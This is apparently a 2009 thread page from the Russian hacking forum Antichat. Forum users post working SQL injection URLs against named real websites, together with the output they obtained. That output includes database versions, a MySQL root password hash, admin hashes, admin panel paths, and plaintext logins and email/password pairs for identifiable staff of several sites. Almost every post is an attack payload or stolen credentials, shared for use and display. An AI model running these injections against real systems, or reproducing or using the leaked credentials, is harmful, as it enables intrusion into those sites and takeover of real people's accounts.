ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7841  
Старый 15.02.2009, 22:31
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.cellulare-magazine.it/news.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version (),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
Database Version : 5.0.51a-3ubuntu5.4
Database name : cel_mag
User name : root@localhost


хватаем админа:

Код:
http://www.cellulare-magazine.it/news.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a ,user,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+mysql.user+limit+0,1--
root:*BB9DD2A2E45245A1F1F7218330AD4AC2551D1498

админка:

Код:
http://www.cellulare-magazine.it/ admin/

Последний раз редактировалось f1ng3r; 15.02.2009 в 23:55..
 
Ответить с цитированием

  #7842  
Старый 15.02.2009, 22:44
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

Цитата:
http://www.maer-sport.ru/news/index.php?id=-12+union+select+1,2,concat_ws(0x20203a2020,version (),user(),database()),4,5
Угадал
Цитата:
http://www.maer-sport.ru/news/index.php?id=-12+union+select+1,2,3,4,5+from+news
Цитата:
http://www.nakhla.co.il/item.php?id=42+union+select+1,2,version(),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32--

Последний раз редактировалось kevmen; 15.02.2009 в 22:52..
 
Ответить с цитированием

  #7843  
Старый 15.02.2009, 23:15
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.portaldeasigurari.ro/stiriint.php?ann=2006&lunaa=-2+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8--




Database Version: 5.0.51a-community
Database name: romasigr_portal
User name: romasigr_puser@localhost
 
Ответить с цитированием

  #7844  
Старый 15.02.2009, 23:50
Аватар для SVAROG
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059

Репутация: 206
По умолчанию

http://www.huntearth.com/searchsection.php?sc=-1+union+select+version()/*&s=Fishing%20Lodge&

Database Version:4.1.22-standard
 
Ответить с цитированием

  #7845  
Старый 15.02.2009, 23:51
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.aparaturafiscala.ro/noutate.php?id=-12+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9




Version : 4.1.22-log
Database : aparaturafiscala_db
User : aparaturafiscala@localhost
 
Ответить с цитированием

  #7846  
Старый 15.02.2009, 23:54
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://cleanenergycouncil.org.au/news/showarticle.php?id=-1+union+select+1,concat _ws(0x3a,version(),data base(),user()),3,4,5,6,7,8,9,10,11--
Database Version : 5.0.48
Database name :cleanene_website
User name : cleanene_website@localhost
 
Ответить с цитированием

  #7847  
Старый 15.02.2009, 23:58
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
Thumbs up

Код:
http://tristihii.ru/news-view.php?ID=-1+union+select+1,2,3,4,group_concat(concat(username,0x3a,password))+from+ADM_USERS--
логины/пассы:
Код:
FIDUKOFF:lutic,SHISHKOV:lexa,ULA:shish,ADMIN:tristihii
-----------------------------------------------------------
Код:
http://kolyada-theatre.ur.ru/history.php?ID=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,10,11,12+from+kol_users--
логин/пасс:
Код:
admin:b0ac5c667f75a17da9b1ff11a1c59f6b
--------------------------------------------------------------
Код:
http://www.e30club.ru/index.php?id=-116+union+select+1,concat(login,0x3a,password),3,4,5,6,7+from+ds_bmwstyle_users
логин/пасс:
Код:
Newsmaker:newstyle
----------------------------------------------------------------
Код:
http://www.aquamaxservice.kiev.ua/articl.php?id=-6+union+select+1,2,3,concat(adm,0x3a,pass),5,6,7+from+admin--
логин/пасс:
Код:
admin:Mjuehuh379
-----------------------------------------------------------------
The End!
 
Ответить с цитированием

  #7848  
Старый 16.02.2009, 00:11
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.graphicart.ro/graphic_art-COM-945GSE,_noul_Module_CPU_COM_Express_cu_procesorul_ Atom_N270_de_la_Intel-12+AND+ASCII(SUBSTRING((select+concat_ws(0x3a,vers ion(),database(),user())%20),26,1))=44.html



Version : 5.0.18-log
Database : graphicartro_gadb
User : graphicartro@www2.linux.ro
 
Ответить с цитированием

  #7849  
Старый 16.02.2009, 00:18
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.stpsb.org/news.php?id=999999+union+select+1,2,3,concat _ws(0x3a ,version(),database(),user()),5,6,7,8,9,10,11,12--
Database Version : 5.1.22-rc
Database name : STPSB
User name : stpsb@localhost


админы и сисадмины:

Код:
http://www.stpsb.org/news.php?id=999999+union+select+1,2,3,concat _ws(0x3a,email ,password),5,6,7,8,9,10,11,12+from+users+limit+0,1--
Код:
admin@nmdesigns.com:test 
ronnie.barthet@stpsb.org:galaxy777
louis.boullion@stpsb.org:f!sh1ng
john.swang@stpsb.org:leoo2419
melody.swang@stpsb.org:smudge
linda.roan@stpsb.org:leroan 
aj.hankel@stpsb.org:w3badmin 
danny.garner@stpsb.org:ball2162 
kevin.hunt@stpsb.org:mememe 
Angela.Daviston@stpsb.org:yagtdb4 
joseph.rogers@stpsb.org:hailyeah
админка:

Код:
http://www.stpsb.org/ admin/
вход по e-mail
 
Ответить с цитированием

  #7850  
Старый 16.02.2009, 00:18
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://top.frontmen.ru/kom.php?id=-1+union+select+1,concat(login,0x3a,password),3,4,5,6+from+users--
-------------------------------------------------------------
The End!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ